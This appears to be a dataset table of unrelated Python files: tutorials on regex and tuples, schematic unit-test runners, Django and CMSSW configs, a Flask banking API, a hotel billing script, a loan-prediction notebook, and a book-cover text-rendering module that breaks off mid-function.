text stringlengths 38 1.54M |
|---|
"""
案例1
#导入相关的包、
import re
#查找相关的数字
#r表示字符串不转义
pattern=re.compile(r'\d+')
#在字符串"123one789two"中按照pattern指定的正则进行查找
match=pattern.match("123one789two")
print(match)
"""
"""
#案例2
#导入相关的包、
import re
#查找相关的数字
#r表示字符串不转义
pattern=re.compile(r'\d+')
#在字符串"123one789two"中按照pattern指定的正则进行查找
#后边的参数0,10表示查找的范围
match=pattern.match("123one789two",0,10)
print(match)
#start
print(match.start(0))
#end
print(match.end(0))
#上述代码说明的问题
#1.match可以输入参数表示想要查找的起始位置
#2.查找到的结果只包含一个,表示第一次进行匹配成功的内容
"""
#案例三
import re
# I表示忽略掉大小写
#下边的相当于分两个组,两组之间必须空开,([a-z]+) ([a-z]+)是一个整体,满足这两个的话打印出来,
# 例如”I am yang ming“,会打印出来“I am”
p=re.compile(r'([a-z]+) ([a-z]+)',re.I)
m=p.match("I aam EROMAN niiu")
print(m)
#下边三个表示整个匹配到的字符串
print(m.group(0))
print(m.start(0))
print(m.end(0))
#下边三个表示第一组的内容和起始的位置
print(m.group(1))
print(m.start(1))
print(m.end(1))
#下边表示将所有的组表示出来
print(m.groups())
|
import os
import sys
import unittest
from pkg_resources import resource_string
from scoville.circuit import Circuit
from scoville.eagleSchematic import EagleSchematic
from scoville.parts import GenericVoltageSource
from unitTests import test_AND, test_OR, test_NAND, test_NOT, test_XOR, test_OneBitSelect, test_ThreeBitSelect
def getCircuitFunction(schematicFileName, supplyName):
    """Build a getCircuit(self) method bound to one schematic file.

    The returned callable loads the Eagle schematic from the 'hw' package,
    converts it to SPICE data, attaches a 5 V generic supply between the
    '_VP' and '_VN' nets, and returns the resulting Circuit.
    """
    def getCircuit(self):
        raw = resource_string('hw', schematicFileName)
        circuit = Circuit(EagleSchematic(raw).getSpiceData())
        circuit.setSignal(GenericVoltageSource(supplyName, '_VP', '_VN', 5.0))
        return circuit
    return getCircuit
def runTests(schematicFileName, testClass):
    """Run testClass against one schematic; return True if every test passed.

    NOTE(review): supplyName is set to 'Vsupply' on the class while the
    literal 'supply' is passed to getCircuitFunction — confirm the mismatch
    is intentional (behavior preserved as-is).
    """
    testClass.supplyName = 'Vsupply'
    testClass.getCircuit = getCircuitFunction(schematicFileName, 'supply')
    suite = unittest.TestLoader().loadTestsFromTestCase(testClass)
    result = unittest.TextTestRunner(verbosity=2).run(suite)
    return result.wasSuccessful()
if __name__ == '__main__':
    # make the current working directory importable so the 'hw' resource
    # package used by getCircuitFunction() can be found
    sys.path.insert(0, os.getcwd())
    success = True
    # run each gate's suite; note that 'and' short-circuits, so after the
    # first failing suite the remaining suites are skipped entirely
    success = success and runTests('singleGates/AND.sch', test_AND.ANDUnitTests)
    success = success and runTests('singleGates/OR.sch', test_OR.ORUnitTests)
    success = success and runTests('singleGates/NAND.sch', test_NAND.NANDUnitTests)
    success = success and runTests('singleGates/NOT-A.sch', test_NOT.NOTUnitTests)
    success = success and runTests('singleGates/NOT-B.sch', test_NOT.NOTUnitTests)
    success = success and runTests('singleGates/XOR.sch', test_XOR.XORUnitTests)
    success = success and runTests('singleGates/1-BitSelect.sch', test_OneBitSelect.OneBitSelectUnitTests)
    success = success and runTests('singleGates/3-BitSelect.sch', test_ThreeBitSelect.ThreeBitSelectUnitTests)
    # shell convention: exit status 0 on success, 1 on any failure
    sys.exit(not success)
|
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
__author__ = 'petro-ew'
"""
35. Write a function that takes an integer x as its argument and returns
the string representation of x in binary (task 35, translated from Russian).
"""


def funcz(x):
    """Return the binary (base-2) string representation of integer *x*."""
    # the 'b' format spec renders an int in base 2 without the '0b' prefix
    return "{0:b}".format(x)


# Bug fix: the whole module was accidentally duplicated verbatim (the second
# copy even started on the same line as the first copy's final print);
# the duplicate definition and duplicate print have been removed.
x = 56
print(funcz(x))
import os
from global_settings import *
# Settings overlay: start from the global defaults, then let an optional
# local settings module (or, failing that, a Heroku-specific pair) override
# them.  Each layer is a star-import, so any name it defines wins over the
# layers imported before it.
try:
    from local_settings import *
    from local_settings_secret import *
except ImportError:
    import warnings
    warnings.warn('Local settings have not been found (src.conf.local_settings). Trying to import Heroku config...')
    try:
        from local_settings_heroku import *
        from local_settings_heroku_secret import *
        warnings.warn('Local Heroku config loaded')
    except ImportError:
        warnings.warn('Heroku local settings not found neither (src.conf.local_settings_heroku)')
# FORCE_SCRIPT_NAME overrides the interpreted 'SCRIPT_NAME' provided by the
# web server. since the URLs below are used for various purposes outside of
# the WSGI application (static and media files), these need to be updated to
# reflect this alteration
# (each URL's leading '/' is stripped with [1:] so os.path.join treats it as
# a path relative to FORCE_SCRIPT_NAME)
if FORCE_SCRIPT_NAME:
    ADMIN_MEDIA_PREFIX = os.path.join(FORCE_SCRIPT_NAME, ADMIN_MEDIA_PREFIX[1:])
    STATIC_URL = os.path.join(FORCE_SCRIPT_NAME, STATIC_URL[1:])
    MEDIA_URL = os.path.join(FORCE_SCRIPT_NAME, MEDIA_URL[1:])
    LOGIN_URL = os.path.join(FORCE_SCRIPT_NAME, LOGIN_URL[1:])
    LOGOUT_URL = os.path.join(FORCE_SCRIPT_NAME, LOGOUT_URL[1:])
    LOGIN_REDIRECT_URL = os.path.join(FORCE_SCRIPT_NAME, LOGIN_REDIRECT_URL[1:])
# This is used as a "seed" for various hashing algorithms. This must be set to
# a very long random string (40+ characters)
# NOTE(review): placeholder value — presumably overridden by one of the
# secret settings modules imported above; verify before deploying.
SECRET_KEY = 'read from secret settings'
# Allow all host headers
ALLOWED_HOSTS = ['*']
# Static asset configuration
# NOTE(review): this unconditional STATIC_URL assignment overwrites any
# FORCE_SCRIPT_NAME-prefixed value computed above — confirm the ordering
# is intentional.
BASE_DIR = os.path.dirname(os.path.abspath(__file__))
STATIC_ROOT = os.path.join(PROJECT_PATH, '_site/static')
STATIC_URL = '/static/'
STATICFILES_DIRS = (
    os.path.join(BASE_DIR, 'static'),
)
|
from utils import json_serialize
from flask_restful import Resource, reqparse
from app import db
from models import Bank, BankBranch, Staff, User
# Shared parser for bank create/update bodies: requires a JSON "name" string,
# otherwise the request is rejected with the given help message.
_bank_parser = reqparse.RequestParser()
_bank_parser.add_argument(name="name", type=str, required=True, help="No Bank Name Provided", location="json")
class BankListApi(Resource):
    """Collection endpoint: list every bank, or register a new one."""

    def get(self):
        """Return all banks, serialized."""
        banks = Bank.query.all()
        return json_serialize(banks)

    def put(self):
        """Create a bank from the validated request body and return it."""
        payload = _bank_parser.parse_args()
        new_bank = Bank(name=payload['name'])
        db.session.add(new_bank)
        db.session.commit()
        return json_serialize(new_bank)
class BankApi(Resource):
    """Item endpoint: fetch, update, or delete a single bank by id."""

    def get(self, bank_id):
        """Return the bank with the given id (404 if absent)."""
        return json_serialize(Bank.query.get_or_404(bank_id))

    def post(self, bank_id):
        """Apply the validated request body to the bank and return it."""
        payload = _bank_parser.parse_args()  # validate body before lookup, as before
        bank = Bank.query.get_or_404(bank_id)
        bank.update(payload)
        db.session.commit()
        return json_serialize(bank)

    def delete(self, bank_id):
        """Remove the bank and return its last serialized state."""
        doomed = Bank.query.get_or_404(bank_id)
        db.session.delete(doomed)
        db.session.commit()
        return json_serialize(doomed)
# Shared parser for branch create/update bodies: requires a JSON "name"
# string, otherwise the request is rejected with the given help message.
_branch_parser = reqparse.RequestParser()
_branch_parser.add_argument(name="name", type=str, required=True, help="No Branch Name Provided", location="json")
class BranchListApi(Resource):
    """Collection endpoint for the branches of a specific bank."""

    def get(self, bank_id):
        """Return every branch belonging to the given bank."""
        parent = Bank.query.get_or_404(bank_id)
        branches = BankBranch.query.filter_by(bank=parent).all()
        return json_serialize(branches)

    def put(self, bank_id):
        """Create a branch under the given bank and return it."""
        payload = _branch_parser.parse_args()  # validate body before lookup, as before
        parent = Bank.query.get_or_404(bank_id)
        new_branch = BankBranch(name=payload['name'], bank=parent)
        db.session.add(new_branch)
        db.session.commit()
        return json_serialize(new_branch)
class BranchApi(Resource):
    """Item endpoint: fetch, update, or delete one branch of one bank."""

    def _get_branch(self, bank_id, branch_id):
        """Resolve the branch scoped to its bank, 404ing on either miss."""
        parent = Bank.query.get_or_404(bank_id)
        return BankBranch.query.filter_by(bank=parent, id=branch_id).first_or_404()

    def get(self, bank_id, branch_id):
        """Return the branch instance."""
        return json_serialize(self._get_branch(bank_id, branch_id))

    def post(self, bank_id, branch_id):
        """Apply the validated request body to the branch and return it."""
        payload = _branch_parser.parse_args()  # validate body before lookups, as before
        branch = self._get_branch(bank_id, branch_id)
        branch.update(payload)
        db.session.commit()
        return json_serialize(branch)

    def delete(self, bank_id, branch_id):
        """Remove the branch and return its last serialized state."""
        branch = self._get_branch(bank_id, branch_id)
        db.session.delete(branch)
        db.session.commit()
        return json_serialize(branch)
# Parser for staff-creation bodies: requires integer "user_id" and "role"
# fields in the JSON payload.
_staff_create_parser = reqparse.RequestParser()
_staff_create_parser.add_argument("user_id", type=int, required=True, help="No User Id Provided", location="json")
_staff_create_parser.add_argument("role", type=int, required=True, help="No Role Provided", location="json")
class StaffListApi(Resource):
    """Collection endpoint for the staff of one bank branch."""

    def get(self, bank_id, branch_id):
        """Return all staff assigned to the branch."""
        parent = Bank.query.get_or_404(bank_id)
        branch = BankBranch.query.filter_by(bank=parent, id=branch_id).first_or_404()
        return json_serialize(branch.staff)

    def put(self, bank_id, branch_id):
        """Attach an existing user to the branch as staff; return the record."""
        payload = _staff_create_parser.parse_args()  # validate body first, as before
        parent = Bank.query.get_or_404(bank_id)
        branch = BankBranch.query.filter_by(bank=parent, id=branch_id).first_or_404()
        member = User.query.get_or_404(payload['user_id'])
        record = Staff(branch=branch, user=member, role=payload['role'])
        member.staff = record
        db.session.add(record)
        db.session.commit()
        return json_serialize(record)
# Parser for staff-update bodies: only the integer "role" may be changed.
_staff_update_parser = reqparse.RequestParser()
_staff_update_parser.add_argument("role", type=int, required=True, help="No Role Provided", location="json")
class StaffApi(Resource):
    """Item endpoint: fetch, update, or delete one staff record.

    NOTE(review): bank_id and branch_id are accepted for URL symmetry but
    the lookup is by staff_id alone — the route does not verify the staff
    member actually belongs to that branch (same as the original behavior).
    """

    def get(self, bank_id, branch_id, staff_id):
        """Return the staff record."""
        return json_serialize(Staff.query.get_or_404(staff_id))

    def post(self, bank_id, branch_id, staff_id):
        """Apply the validated request body to the staff record; return it."""
        payload = _staff_update_parser.parse_args()  # validate body before lookup, as before
        record = Staff.query.get_or_404(staff_id)
        record.update(payload)
        db.session.commit()
        return json_serialize(record)

    def delete(self, bank_id, branch_id, staff_id):
        """Remove the staff record and return its last serialized state."""
        record = Staff.query.get_or_404(staff_id)
        db.session.delete(record)
        db.session.commit()
        return json_serialize(record)
|
"""
Customer Name
Contact
ID
Date
Days
room
rent =1000
tot =rent*days*rooms
0 - 5 = 5%
5 - 10 = 10%
10 - 15 = 15%
more than 15 = 20%
"""
name = input("Enter Customer Name : ")
contact = input("Enter Contact Number : ")
Id = input("Enter ID Number : ")
date = input("Enter Date of Booking : ")
days = int(input("Enter Number of Days : "))
rooms = int(input("Enter Number of rooms : "))
rent = 1000
tot = rent*days*rooms
if(days>0 and days<=5):
dis = tot*0.05
net = tot-dis
elif(days>5 and days<=10):
dis = tot*0.1
net = tot-dis
elif(days>10 and days<=15):
dis = tot*0.15
net = tot-dis
else:
dis = tot*0.2
net = tot-dis
print("******* Billing Information ********")
print("Customer Name : ",name)
print("Contact Number : ",contact)
print("ID Number : ",Id)
print("Date : ",date)
print("No.of.Days : ",days)
print("No.of.rooms : ",rooms)
print("Total Amount : ",tot)
print("Discount : ",dis)
print("Net Pay : ",net)
|
#!/usr/bin/env python
# coding: utf-8
# Jupyter-exported notebook: exploring LendingClub-style loan data and
# predicting 'not.fully.paid' with a decision tree vs. a 500-tree random
# forest.  The "# In[..]" markers are the original notebook cell numbers.
# In[2]:
import pandas as pd
import numpy as np
import matplotlib.pyplot as plt
import seaborn as sns
# notebook-only magic; requires an IPython kernel to run
get_ipython().run_line_magic('matplotlib', 'inline')
# In[3]:
# expects loan_data.csv in the working directory
df=pd.read_csv('loan_data.csv')
# In[4]:
df.head()
# In[5]:
fig=sns.pairplot(df)
# In[9]:
fig.savefig('pairplots2.jpg')
# In[12]:
df['purpose'].unique()
# In[15]:
df
# In[21]:
# overlayed FICO histograms split by credit policy
fig=df[df['credit.policy']==1]['fico'].hist(label='Credit_policy=1',alpha=0.6)
fig=df[df['credit.policy']==0]['fico'].hist(label='Credit_policy=0',alpha=0.6)
plt.legend()
# In[22]:
# overlayed FICO histograms split by repayment outcome
fig=df[df['not.fully.paid']==1]['fico'].hist(label='Not Fully Paid=1',alpha=0.6)
fig=df[df['not.fully.paid']==0]['fico'].hist(label='Not Fully Paid=0',alpha=0.6)
plt.legend()
# In[28]:
plt.figure(figsize=(11,8))
fig=sns.countplot(x='purpose',data=df,hue='not.fully.paid')
# In[29]:
sns.jointplot(x='fico',y='int.rate',data=df)
# In[32]:
#creating dummies for catagorical data i.e purpose
# In[33]:
cf=['purpose']
# In[34]:
final_data=pd.get_dummies(df,columns=cf,drop_first=True)
# In[35]:
final_data.head()
# In[36]:
#train test split the data
# In[39]:
x=final_data.drop('not.fully.paid',axis=1)
y=final_data['not.fully.paid']
# In[40]:
from sklearn.model_selection import train_test_split
# In[41]:
# NOTE(review): 50/50 split and no random_state — results will vary per run
x_train,x_test,y_train,y_test=train_test_split(x,y,test_size=0.5)
# In[42]:
#set the model using decision tree
# In[43]:
from sklearn.tree import DecisionTreeClassifier
# In[44]:
dtc=DecisionTreeClassifier()
# In[45]:
dtc.fit(x_train,y_train)
# In[46]:
pred1=dtc.predict(x_test)
# In[47]:
pred1
# In[48]:
#evaluate data
# In[49]:
from sklearn.metrics import confusion_matrix,classification_report
# In[53]:
print(confusion_matrix(y_test,pred1))
print()
print(classification_report(y_test,pred1))
# In[55]:
# NOTE(review): positional x/y args to seaborn's lineplot are deprecated in
# newer seaborn; a lineplot of labels vs. predictions is also an unusual
# evaluation plot — confirm intent.
sns.lineplot(y_test,pred1)
# In[52]:
#now using random forest with n_estimator as 500
# In[56]:
from sklearn.ensemble import RandomForestClassifier
# In[63]:
rfc=RandomForestClassifier(n_estimators=500)
# In[64]:
rfc.fit(x_train,y_train)
# In[65]:
pred2=rfc.predict(x_test)
# In[66]:
pred2
# In[61]:
#evaluate data
# In[67]:
print(confusion_matrix(y_test,pred2))
print()
print(classification_report(y_test,pred2))
# In[68]:
sns.lineplot(y_test,pred2)
# In[69]:
#comparison
# In[74]:
sns.lineplot(pred1,pred2)
# In[ ]:
#the end
|
import FWCore.ParameterSet.Config as cms
from EventFilter.CSCRawToDigi.cscDigiFilterDef_cfi import cscDigiFilterDef
def appendCSCChamberMaskerAtUnpacking(process):
    """Insert a CSC digi filter between unpacking and downstream consumers.

    If the process has a 'muonCSCDigis' producer, the original unpacker is
    kept under the new name 'preCSCDigis' and 'muonCSCDigis' is replaced by
    a clone of cscDigiFilterDef that reads every digi collection from
    'preCSCDigis' — so downstream modules transparently consume the
    (optionally masked) digis without any configuration change.
    Returns the (possibly modified) process.
    """
    if hasattr(process,'muonCSCDigis') :
        # clone the original producer
        process.preCSCDigis = process.muonCSCDigis.clone()
        # now apply the filter, re-pointing every input tag at the clone
        process.muonCSCDigis = cscDigiFilterDef.clone(
            stripDigiTag = "preCSCDigis:MuonCSCStripDigi",
            wireDigiTag = "preCSCDigis:MuonCSCWireDigi",
            comparatorDigiTag = "preCSCDigis:MuonCSCComparatorDigi",
            alctDigiTag = "preCSCDigis:MuonCSCALCTDigi",
            clctDigiTag = "preCSCDigis:MuonCSCCLCTDigi",
            lctDigiTag = "preCSCDigis:MuonCSCCorrelatedLCTDigi",
            showerDigiTag = "preCSCDigis:MuonCSCShowerDigi",
            gemPadClusterDigiTag = "preCSCDigis:MuonGEMPadDigiCluster",
            maskedChambers = [],
            selectedChambers = []
        )
        # keep the relocated unpacker scheduled
        process.RawToDigiTask.add(process.preCSCDigis)
    return process
def maskExperimentalME11ChambersRun2(process):
    """Mask the three ME1/1 chambers that ran partial Phase-2 firmware in Run-2.

    Applies the CSC chamber masker (see appendCSCChamberMaskerAtUnpacking)
    and lists the affected chambers so their digis are dropped.
    """
    process = appendCSCChamberMaskerAtUnpacking(process)
    # these 3 chambers had Phase-2 firmware loaded partially during Run-2
    process.muonCSCDigis.maskedChambers = [
        "ME+1/1/9", "ME+1/1/10", "ME+1/1/11"]
    # Bug fix: return the customised process like the sibling customisation
    # function above; callers rebinding 'process = maskExperimental...'
    # previously received None.
    return process
|
# Tuples are ordered, immutable collection data types; duplicates are allowed
# similar to a list, but a tuple cannot be changed after it is created
# no sort or reverse
# often used for objects that belong together
# ()
# the parentheses are optional
mytuple = ("Vika", 28, "Beograd")
print(mytuple)
# with only one element it is not recognized as a tuple...
mytuple1 = ("Vile")
print(type(mytuple1))
# ...it is treated as a string; a trailing comma makes it a tuple
mytuple1 = ("Vile",)
print(type(mytuple1))
# a tuple can also be created with the tuple() function, from any iterable,
# e.g. a list
mytuple = tuple(["Vika", 29, "Ulica"])
print(mytuple)
# element access by index
item = mytuple[0]
print(item)
# -1 is the last element, -2 the second-to-last, and so on
# if we try to change an element:
#mytuple[0] = "Tima"
print(mytuple)
# that is impossible, because tuples are immutable
# looping
for i in mytuple:
    print(i)
# check whether an item is in the tuple
if "la" in mytuple:
    print("yes")
else:
    print("no")
# how many elements are in the tuple
print(len(mytuple))
# counting occurrences
print(mytuple.count('V'))
# index of an element
print(mytuple.index(29))
# converting a tuple to a list and back
myList = list(mytuple)
print(myList)
mytuple2 = tuple(myList)
print(mytuple2)
# slicing - access parts of the tuple with :
a = (1,2,3,4,5,6)
b = a[2:5]
print(b)
# omitting start begins at the beginning; omitting stop goes to the end
# e.g. :5 from the start, 1: to the end
# optional step index [::1] - take every item,
# [::2] - take every second item
# [::-1] - reverse the tuple
# unpacking
my_tuple = "Max", 28, "Pariz"
name, age, city = my_tuple
print(age)
print(name)
print(city)
# the number of targets must match the number of tuple elements
# unpack multiple elements with *
my_tuple = (0,1,2,3,4)
#i1, *i2, i3 = my_tuple -> (this was reported not to work here)
#print(i1)
#print(i3)
#print(i2) # all elements between the first and last, converted into a list
# comparing tuple and list memory sizes: the list is larger
# using import sys and the getsizeof method
import sys
my_list = [0,1,2,"cao"]
my_tuplee = (0,1,2,"cao")
print(sys.getsizeof(my_list),"bytes")
print(sys.getsizeof(my_tuplee),"bytes")
# timing comparison with the timeit module
# tuples are faster, i.e. more efficient than lists
import timeit
print(timeit.timeit(stmt="[0,1,2,3,4]",number=1000000))
print(timeit.timeit(stmt="(0,1,2,3,4)",number=1000000))
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
# Text-to-Image module
import os
import re
import sys
import time

from PIL import Image, ImageDraw, ImageFont
from random import *
from util import *
from title.titletemplates import *
from title.bgprofiles import *
from title.generators import Generator
import title.util as titutil
COVER_PATH = "title/resources/cover_images/"
FONT_PATH = "title/resources/fonts/"
PATCH_PATH = "title/resources/"
MAX_IMG_NUM = 24
RESOLUTION = 4.167
LOWERTITLETEXTBOUND = 527
MAXWIDTH = 910
MINFONTSIZE = 12
XOFFSET = int(round((971 - MAXWIDTH) / 2))
AUTHORNAME_YOFFSET = 560
MINSPACERHEIGHT = 13
VERT_SEP_PROP = 2 # proportion of text height to use as
# separator between two lines of the
# the same type
BGImgQ = HistoryQ(iQSize = 5)
def RGBtoHex(sRGBcode):
    """Convert an (r, g, b) tuple of 0-255 ints to a '#rrggbb' hex string."""
    r, g, b = sRGBcode
    return '#{:02x}{:02x}{:02x}'.format(r, g, b)
def CalcTextSizeScore(sText):
    """Heuristic 'visual size' score for a piece of title text.

    Score = (char count / 4) + (uppercase count + average word length)
            - (number of gaps between words)
    Per the original note, scores > 23 need a larger template.

    Bug fix: returns 0.0 for text containing no words (empty or
    punctuation-only strings previously raised ZeroDivisionError).
    """
    words = re.findall(r"[\w']+", sText)
    if not words:
        return 0.0
    iCharCount = len(sText)
    dAvgWordLen = iCharCount / len(words)
    # gaps between words (not a literal whitespace count)
    iWhiteSpaceChars = len(words) - 1
    iUpperCaseChars = sum(1 for c in sText if c.isupper())
    return (iCharCount / 4) + (iUpperCaseChars + dAvgWordLen) - iWhiteSpaceChars
def GetBGImg(sFileName):
    """Load a cover background image as RGBA; return None if it cannot be opened."""
    sFullPath = COVER_PATH + sFileName
    try:
        return Image.open(sFullPath).convert('RGBA')
    except IOError as e:
        print("***ERROR***\nGetBGImg() Failed to open file " + sFullPath + ":\n" + e.strerror)
        return None
class BGImageHH:
    """Background variant with a half-height header ('hh'): the title box
    spans y=210..525 of the cover."""
    TitleBoxTop_yOffset = 210
    TitleBoxBottom_yOffset = 525
    FileSuffix = "hh"

    def __init__(self, BGProfile):
        # vertical space available for title text
        self.MaxHeight = self.TitleBoxBottom_yOffset - self.TitleBoxTop_yOffset
        self.FileName = BGProfile.FileName + "_hh.jpg"
        self.Image = GetBGImg(self.FileName)  # None if the file is missing
class BGImagePH:
    """Background variant with a plain header ('ph'): a taller title box
    spanning y=118..525 of the cover."""
    TitleBoxTop_yOffset = 118
    TitleBoxBottom_yOffset = 525
    # Bug fix: suffix was copy-pasted as "hh" from BGImageHH even though this
    # class loads the "_ph.jpg" file.
    FileSuffix = "ph"

    def __init__(self, BGProfile):
        # vertical space available for title text
        self.MaxHeight = self.TitleBoxBottom_yOffset - self.TitleBoxTop_yOffset
        self.FileName = BGProfile.FileName + "_ph.jpg"
        self.Image = GetBGImg(self.FileName)  # None if the file is missing
def GetTextLineSize(font, sLine):
    """Return (width, height) of sLine rendered with font, adjusted by the
    font's drawing offset (width grows by it, height shrinks by it)."""
    base_w, base_h = font.getsize(sLine)
    off_w, off_h = font.getoffset(sLine)
    return base_w + off_w, base_h - off_h
def CalcMinSpacerHeight(TitleBoxes):
    """Return the minimum vertical spacer to place between title boxes.

    With 3+ boxes this is the second-largest spacer-scaled descender
    (the first box's descender is ignored); with exactly 2 boxes it is the
    smaller of line 1's descender and line 2's ascender; a single box needs
    no spacer.  The result is capped at CalcMaxSpacerHeight(TitleBoxes) and
    rounded to 2 decimals.
    """
    iMinSpacerHeight = 0
    aDescenderHeights = []
    iLastDescender = 0
    if len(TitleBoxes) > 2:
        for boxno, box in enumerate(TitleBoxes):
            (ascender, descender) = box.Font.getmetrics()
            # scale the metrics by each box's spacer percentage
            (ascender, descender) = (ascender * (box.SpacerPercent * .1), descender * (box.SpacerPercent * .1))
            # first title line, ignore descender
            if boxno == 0:
                pass
            else:
                aDescenderHeights.append(descender)
        if len(aDescenderHeights) > 1:
            # second-largest collected descender
            iMinSpacerHeight = sorted(aDescenderHeights)[-2]
    elif len(TitleBoxes) == 2:
        iLine1Descender = TitleBoxes[0].Font.getmetrics()[1]
        iLine2Ascender = TitleBoxes[1].Font.getmetrics()[0]
        if iLine1Descender > iLine2Ascender:
            iMinSpacerHeight = iLine2Ascender
        else:
            iMinSpacerHeight = iLine1Descender
    else:
        iMinSpacerHeight = 0
    # never exceed the tallest box's height
    iMaxSpacerHeight = CalcMaxSpacerHeight(TitleBoxes)
    if iMinSpacerHeight > iMaxSpacerHeight:
        iMinSpacerHeight = iMaxSpacerHeight
    return round(iMinSpacerHeight, 2)
def CalcMaxSpacerHeight(TitleBoxes):
    """Return the largest box height, or 0 for an empty list of boxes."""
    return max((box.Height for box in TitleBoxes), default=0)
class LineOfText():
    """A single wrapped line of title text plus its layout placement."""

    def __init__(self, sText="", iOrderNo=0, iHeight=0, iWidth=0):
        self.Text = sText
        self.OrderNo = iOrderNo
        self.Height = iHeight
        self.Width = iWidth
        self.StartXY = (0, 0)  # top-left corner; filled in during layout
def WrapText(sText, font, max_line_width):
    # break string into multiple lines that fit max_line_width
    # and return an array of strings
    """Greedily wrap sText into LineOfText objects no wider than
    max_line_width when rendered with font.

    Lines break at the most recent whitespace or '-'; explicit '\\n'
    characters force a break; a single over-long word is split near its
    middle.
    """
    Lines = []
    iNumLines = 0
    iLastWhtSpc = 0      # index of the most recent breakable character
    iSubStart = 0        # index where the current line begins
    sLineSoFar = ""
    sLastValidLine = ""  # longest prefix of the current line ending at a break
    for charno, char in enumerate(sText):
        if char.isspace() or char == "-":
            iLastWhtSpc = charno
            sLastValidLine = sText[iSubStart:iLastWhtSpc]
        sLineSoFar += char
        # if character is a line break or line is longer than max
        # width
        if not len(sLineSoFar) == 0 and \
           (char == "\n" or \
            font.getsize(sLineSoFar)[0] >= max_line_width):
            # if there is no recent whitespace char but we are past
            # the max width, split the middle
            if iLastWhtSpc < iSubStart:
                iLastWhtSpc = int((charno - iSubStart)/2)
                # NOTE(review): this assigns a length offset, not an absolute
                # index, so for an over-long word occurring mid-string the
                # slice below looks suspect — confirm intended behavior.
                sLastValidLine = sText[iSubStart:iLastWhtSpc]
            # add the last valid text as a new line
            Lines.append(LineOfText(sLastValidLine, len(Lines) + 1))
            # move substring start forward and reset substring values
            iSubStart = iLastWhtSpc + 1
            sLastValidLine = ""
            sLineSoFar = sText[iSubStart:charno + 1]
    # whatever remains becomes the final line
    Lines.append(LineOfText(sLineSoFar, len(Lines) + 1))
    return Lines
def CalcBoxHeight(sFontName, iMaxFontSize, iMaxRows, Color = (0,0,0,255)):
    """Return the pixel height of a text box holding iMaxRows lines of
    sFontName at iMaxFontSize, including inter-row separation.

    Returns 0 if the font file cannot be opened.
    NOTE(review): the Color parameter is unused — kept for call compatibility.
    """
    iBoxHeight = 0
    try:
        Font = ImageFont.truetype(FONT_PATH + sFontName, size = iMaxFontSize, index = 0)
        # height of one line containing the full alphabet (a tall sample)
        iLineHeight = GetTextLineSize(Font,"ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz")[1]
        # rows plus (rows - 1) separators of 1/VERT_SEP_PROP line height
        iBoxHeight = (iLineHeight * iMaxRows) + (int(round(iLineHeight/VERT_SEP_PROP)) * (iMaxRows - 1))
    except OSError as e:
        print("**ERROR** CalcBoxHeight() failed to open font file " + FONT_PATH + sFontName + ". OSError: " + str(e))
    return iBoxHeight
class TitleSection:
    """One block of title text (main title, subtitle, small text, or author
    name) that wraps and shrinks itself to fit a bounding box on the cover."""

    def __init__(self,
                 sText = "",
                 sFontName = "",
                 iFontSize = 10,
                 iMaxRows = 1,
                 Color = (0,0,0,255)):
        self.Text = sText
        self.FontName = sFontName
        self.FontFileName = FONT_PATH + self.FontName
        self.FontSize = iFontSize
        # font size scaled from points to cover pixels
        self.AdjFontSize = round(int(self.FontSize * RESOLUTION))
        self.MaxRows = iMaxRows
        self.Color = Color
        self.BoundingBoxWidth = MAXWIDTH
        self.BoundingBoxHeight = CalcBoxHeight(self.FontName, self.AdjFontSize, self.MaxRows)
        self.TotLineHeight = 0
        self.DecreaseSizeBy = 3   # font-size step used when shrinking to fit
        self.VertSepProp = 4
        self.TotalLineSpace = self.BoundingBoxHeight
        self.SpacerPercent = 10   # line spacing as a percentage of line height
        self.Height = 0
        self.Width = 0
        self.LineSpace = 0
        self.Lines = []
        self.SetFont()
        # shrink font until lines do not exceed bounding text box's height;
        # each failed fit lowers the font size and allows one more row
        iLoopCount = 1
        while not self.FitTextToBox():
            self.FontSize = iFontSize + (self.DecreaseSizeBy * (-1 * iLoopCount))
            self.AdjFontSize = round(int(self.FontSize * RESOLUTION))
            self.MaxRows += 1
            self.BoundingBoxHeight = CalcBoxHeight(self.FontName, self.AdjFontSize, self.MaxRows)
            self.SetFont()
            iLoopCount += 1

    def CalcTotLineHeight(self):
        """Sum the rendered heights of all wrapped lines; a blank line
        counts as half the height of a sample character."""
        iHeight = 0
        for line in self.Lines:
            if line.Text.isspace() or line.Text == "":
                iHeight += GetTextLineSize(self.Font, "a")[1] / 2
            else:
                iHeight += GetTextLineSize(self.Font, line.Text)[1]
        return iHeight

    def FitTextToBox(self):
        """Wrap the text and shrink the font step by step until it fits the
        bounding box; return False if MINFONTSIZE is reached first."""
        bSuccess = True
        # wrap the text based on the bounding text box's width
        self.Lines = WrapText(self.Text, self.Font, self.BoundingBoxWidth)
        # calculate the height of the text
        self.TotLineHeight = self.CalcTotLineHeight()
        while self.TotLineHeight > self.BoundingBoxHeight or len(self.Lines) > self.MaxRows:
            self.FontSize = (self.FontSize + (self.DecreaseSizeBy * (-1)))
            if self.FontSize < MINFONTSIZE:
                bSuccess = False
                break
            self.SetFont()
            self.Lines = WrapText(self.Text, self.Font, self.BoundingBoxWidth)
            self.TotLineHeight = self.CalcTotLineHeight()
        return bSuccess

    def SetFont(self):
        """(Re)load self.Font at the current FontSize scaled by RESOLUTION."""
        #print(" - SetFont() for [" + self.Text + "]. Font is [" + self.FontName + "], size = " + str(self.FontSize))
        try:
            self.Font = ImageFont.truetype(FONT_PATH + self.FontName, size = round(int(self.FontSize * RESOLUTION)), index = 0)
        except OSError as e:
            print("**ERROR** SetFont() failed to open font file " + FONT_PATH + self.FontName + ". OSError: " + str(e))

    def SetDimensions(self):
        """Compute each line's top-left start position (horizontally
        centered) and the section's total Height at the current font size."""
        ImgTxt = None
        # how much the text in the box is offset from the box
        xOffset = 0 #.027
        yOffset = 0 #.027
        self.SetFont()
        self.Height = 0
        if len(self.Lines) > 1:
            self.LineSpace = self.TotalLineSpace / (len(self.Lines) - 1)
        else:
            self.LineSpace = 0
        ascender, descender = (0, 0)
        pad_width, pad_height = (0, 0)
        for iCount, line in enumerate(self.Lines):
            start_x, start_y = (0,0)
            adj_width, adj_height = (0, 0)
            if line.Text.isspace() or line.Text == "":
                adj_width, adj_height = GetTextLineSize(self.Font, "a")
                adj_height = adj_height / 2
            else:
                ascender, descender = self.Font.getmetrics()
                adj_width, adj_height = GetTextLineSize(self.Font, line.Text)
